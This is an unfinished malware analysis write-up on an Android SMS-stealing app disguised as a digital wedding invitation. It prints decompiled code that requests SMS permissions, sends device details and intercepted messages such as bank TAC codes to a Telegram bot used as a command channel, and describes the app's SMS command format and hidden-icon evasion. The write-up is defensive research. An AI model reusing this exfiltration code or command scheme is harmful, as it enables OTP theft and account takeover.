Kad Kahwin SMS Logger

⚠️ Under Construction ⚠️

First of all, we extend our heartfelt gratitude to Mr. Fareed Fauzi for his invaluable guidance, as well as to the CyberSecurity Malaysia team for generously providing the sample.

File Information

File Name: KAD KAHWIN DIGITAL.apk Package Name: com.rndytech.smstest Size: 4.92MB

I want arif to find out what is the function of hash? since his discord name is hash_kira lemao

MD5: a21bc85e2275c90305d9a2a14d7a6664 SHA1: a5e22c9a97ebd7ca3f14d11341b0fbc093221ccb SHA256: 982b360b0cf8fcd0dec00f233cdeeb191876d4301dd8e62e75ff2909a5b03cfc

Analysis

Application Permission

Malicious applications abuse android permissions for several illegitimate usages.

Interesting.. no application permission was found in MobSF

![[Pasted image 20240506202246.png]]

So we take a closer look at the AndroidManifest.xml file, why?

Well in AndroidManifest.xml file, sometimes it outlines a system permission that must be granted by the user for the app to function properly.

And by using MobSF frameworks its supposed to grab all of the permission that is stated in the AndroidManifest.xml file.

<?xml version="1.0" encoding="utf-8"?>

<manifest package="com.rndytech.smstest" platformBuildVersionCode="32" platformBuildVersionName="13" android:versionCode="1" android:versionName="1.0" android:compileSdkVersion="32" android:compileSdkVersionCodename="13" android:tag="" android:tag=""

xmlns:android="http://schemas.android.com/apk/res/android">

But... still nothing to be found, this might be an anti-analysis technique made by the threat actor so we only left with one option which is to analyze the source code, and find out where the threat actor ask the user for application permission

 if (Build.VERSION.SDK_INT >= 19) {
            this.webviewku.setLayerType(2, null);
        } else if (Build.VERSION.SDK_INT >= 11 && Build.VERSION.SDK_INT < 19) {
            this.webviewku.setLayerType(1, null);
        }
        if (Build.VERSION.SDK_INT >= 23 && checkSelfPermission("android.permission.SEND_SMS") != 0 && checkSelfPermission("android.permission.READ_SMS") != 0) {
            requestPermissions(new String[]{"android.permission.SEND_SMS", "android.permission.READ_SMS"}, 2000);
        }
        if (Build.VERSION.SDK_INT < 23 || checkSelfPermission("android.permission.RECEIVE_SMS") == 0) {
            return;
        }
        requestPermissions(new String[]{"android.permission.RECEIVE_SMS"}, 1000);

Voila here in com/example/myapplication/MainActivity.java its stated that the application will ask for user permission for :-

android.permission.SEND_SMS
android.permission.READ_SMS
android.permission.RECEIVE_SMS

I want derf to find out apa function SEND_SMS and READ_SMS

I want arif to find out apa function RECEIVE_SMS

Code Analysis

Here MobSF stated that

1. The app logs (record) sensitive information of the user

2. The application is vulnerable due to the fact that production application must not be debuggable

![[Pasted image 20240506205838.png]]

Malicious Code in MainActivity.java

Before the application started the application ask for user permission as stated before.

   if (Build.VERSION.SDK_INT >= 19) {
            this.webviewku.setLayerType(2, null);
        } else if (Build.VERSION.SDK_INT >= 11 && Build.VERSION.SDK_INT < 19) {
            this.webviewku.setLayerType(1, null);
        }
        if (Build.VERSION.SDK_INT >= 23 && checkSelfPermission("android.permission.SEND_SMS") != 0 && checkSelfPermission("android.permission.READ_SMS") != 0) {
            requestPermissions(new String[]{"android.permission.SEND_SMS", "android.permission.READ_SMS"}, 2000);
        }
        if (Build.VERSION.SDK_INT < 23 || checkSelfPermission("android.permission.RECEIVE_SMS") == 0) {
            return;
        }
        requestPermissions(new String[]{"android.permission.RECEIVE_SMS"}, 1000);

After granting permission, the threat actor appears to be attempting to create a facade of legitimacy for the application by incorporating content from an external website, confirmed to be owned by a different company, ejemputan, into its application.

![[Pasted image 20240507165355.png|300]]

WebView webView = (WebView) findViewById(R.id.my_web);
        this.webviewku = webView;
        WebSettings settings = webView.getSettings();
        this.websettingku = settings;
        settings.setJavaScriptEnabled(true);
        this.webviewku.setWebViewClient(new WebViewClient());
        this.webviewku.loadUrl("https://ejemputan.com/kadkahwindigital");

Apart from that, the code will immediately notify its C2C (command and control server), regarding the information of the victim's device, in this case its a Telegram Bot/Account.

String device = "ID : " + Build.ID + "\n - User : " + Build.USER + "\n - Product : " + Build.PRODUCT + "\n - Brand : " + Build.BRAND + "\n - Device : " + Build.DEVICE + "\n - Board : " + Build.BOARD + "\n - BOOTLOADER : " + Build.BOOTLOADER + "\n - DISPLAY : " + Build.DISPLAY + "\n - FINGERPRINT : " + Build.FINGERPRINT + "\n - HARDWARE : " + Build.HARDWARE + "\n - HOST : " + Build.HOST + "\n -MANUFACTURER : " + Build.MANUFACTURER + "\n - MODEL : " + Build.MODEL + "\n -TAGS : " + Build.TAGS + "\n - TYPE : " + Build.TYPE + "\n - Product : " + Build.TIME + "\n - ";

Victim's Device Information Logged:-

1. ID

2. User

3. Product

4. Brand

5. Device

6. Board

7. Bootloader

8. Display

9. Fingerprint

10. Hardware

11. Host

12. Manufacturer

13. Model

14. Tags

15. Type

16. Product

Note that there are 2 different objects that is used to send message towards the actor's C2C, build and build2.

Request build = new Request.Builder().url("https://api.telegram.org/{REDACTED}sdBc2OFVj8CdEQNr9G1lVlY5K8I/sendMessage?parse_mode=markdown&chat_id=5876222887&text= DETECT SMS - Hak Cipta LanaGt : \n" + this.device).build();

Request build2 = new Request.Builder().url("https://api.telegram.org/{REDACTED}sdBc2OFVj8CdEQNr9G1lVlY5K8I/sendMessage?parse_mode=markdown&chat_id=5876222887&text= 𝐀𝐩𝐥𝐢𝐤𝐚𝐬𝐢 𝐓𝐞𝐫𝐢𝐧𝐬𝐭𝐚𝐥 \n Detail Perangkat : \n" + this.device).build();

To further analyze the information that was sent to the C2C, we can intercept the request between the application and the Telegram bot using Burp Suite.

An android emulator was also used to act as a dummy victim's phone data.

Communication of build object. ![[Pasted image 20240508120154.png]]

Communication of build2 object. ![[Pasted image 20240508120221.png]]

Decoded URL of the text sent on build object ![[Pasted image 20240508120408.png]]

Decoded URL of the text sent on build2 object ![[Pasted image 20240508120340.png]]

Malicious Code in ReceiveSms.java

Here in this file it act as a listener, that will wait upon upcoming SMS messages that will be received by the victim's phone. Once the signal triggers, it will grab the phone number of the sender together with the content of the message and send it to the C2C. ![[carbon (3).png]]

The communication were intercepted using Burp Suite, and here to test the code we created a dummy data of random phone number and bait TAC message content, to mimic what were usually sent to victim's SMS. ![[photo_2024-05-08_11-45-03.jpg]]

Communication of build object ![[Pasted image 20240508121953.png]]

Decoded URL Message that was sent to C2C.

Pesan Detect SMS, SMS from :6505551212, Pesan : RM0 myASNB Portal: Forgot Password Request. TAC is 514749. Exp by 03/05/2024 08:10:27 MYT

Malicious Code in SendSMS.java

Here is how the threat actor can silently intercept SMS messages and send them to a new specified phone number.

First, the threat actor, will send a message that will look like this to the victim's phone number

55555&012765310#Sending this malicious text to the specified phone number....

When the SMS is received on the victim's phone number, the code extracts the SMS messages into three parts, separated by & and # character.

str3 which act as arbitrary code

55555

str4 which act as another victim phone number

0127650310

str5 which act as the text messages to send to another phone number

Sending this malicious text to the specified phone number....

outcome

Once confirmed that the str3 code is 55555 it proceeds to send a text message (content of str5) to the phone number extracted to the variable str4.

Also the C2C will be notified when sending the message status is success.

![[carbon (4).png]]

Anti-Analysis Techniques

![[Pasted image 20240507175453.png]] When the application is downloaded, the victim won't be able to find the application on the main menu since it was hidden because of its 'null' name. We also couldn't find it at first however when talking a look at the settings > all apps, it was shown at the very top of the list

Furthermore, the application permission was hidden by the actor, can refer to Application Permission section above for more details.

Finding out the Threat Actor

Here in the MobSF there is a find content feature that will filter out all of the codes based from the expression/string that we want to find. First if we filter out the API bot, then there are random phone number lies in the source code, and the country code is from Indonesia.

![[Pasted image 20240508130307.png]]

![[Pasted image 20240508130214.png]]

![[Pasted image 20240508130247.png]]

Based from previous find, we also found out that the conversation between telegram C2C were mostly written in Indonesia too.

For example, "Aplikasi Terinstal Detail Perangkat"![[Pasted image 20240508173759.png]]

It sounds like Indonesian dialect, therefore we were 90% sure that the threat actor is from Indonesia.

Lesson Learned

Malicious Purposes of the Application

SMS Interception

This application has the malicious capabilities to do send, receive and read SMS messages. It intercepts incoming SMS messages, extract sender information and message content, and send this data to a C2C

So, they have the capabilities to extract sensitive information like, One-Time Passwords (OTPs), which commonly used as Two-Factor Authentication (2FA) technique nowadays. With access to incoming OTPs, they will be able to initiate unauthorized account takeovers on various platform including email, social media, banking application, and etc.

Tools for APK Analysis

MobSF is an automated all-in-one mobile application malware analysis and security assessment framework ![[ec45ab80-b46b-11e9-9f7f-6db13d2e8507.png]]

[An Android Virtual Device (AVD) can simulate Android Emulator that can run in your desktop, this is how we operates the Dynamic Analysis](https://developer.android.com/studio/run/managing-avds#:~:text=An%20Android%20Virtual%20Device%20(AVD,simulate%20in%20the%20Android%20Emulator.) ![[51121362-9420c200-1817-11e9-9eae-64a72b2fc5b9.png]]

Burp Suite can intercept a communication between any application with the back-end server. You can modify the request too, but you need to setup the proxy connection![[6321a0f076706854ff591093_All about BurpSuite.jpg]]